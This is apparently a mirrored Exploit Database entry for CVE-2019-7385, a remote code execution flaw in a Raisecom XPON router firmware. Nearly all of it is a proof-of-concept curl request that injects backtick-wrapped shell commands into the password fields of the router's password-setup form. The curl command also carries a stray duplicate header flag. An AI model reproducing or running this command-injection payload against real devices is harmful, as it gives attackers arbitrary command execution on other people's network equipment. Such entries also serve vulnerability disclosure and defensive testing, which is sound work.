Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 – Remote Code Execution

• Exploit Database
• 19 阅读

• 作者： JameelNabbo
  日期： 2019-03-04
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/46489/

• # Exploit Title: Remote code execution in Raisecom xpon
  # Date: 03/03/2019
  # Exploit Author: JameelNabbo
  # Website: Ordina.nl
  # Vendor Homepage: https://www.raisecom.com
  # Software Link: https://www.raisecom.com/products/xpon
  # Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
  # Tested on: MacOSX
  # CVE-2019-7385
  
  POC:
  curl -i -s -k -X 'POST' \
  -H 'Origin: http://127.0.0.1' -H -H 'Content-Type:
  application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
  like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
  --data-binary
  $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
  \
  'http://192.168.1.1/boaform/formPasswordSetup'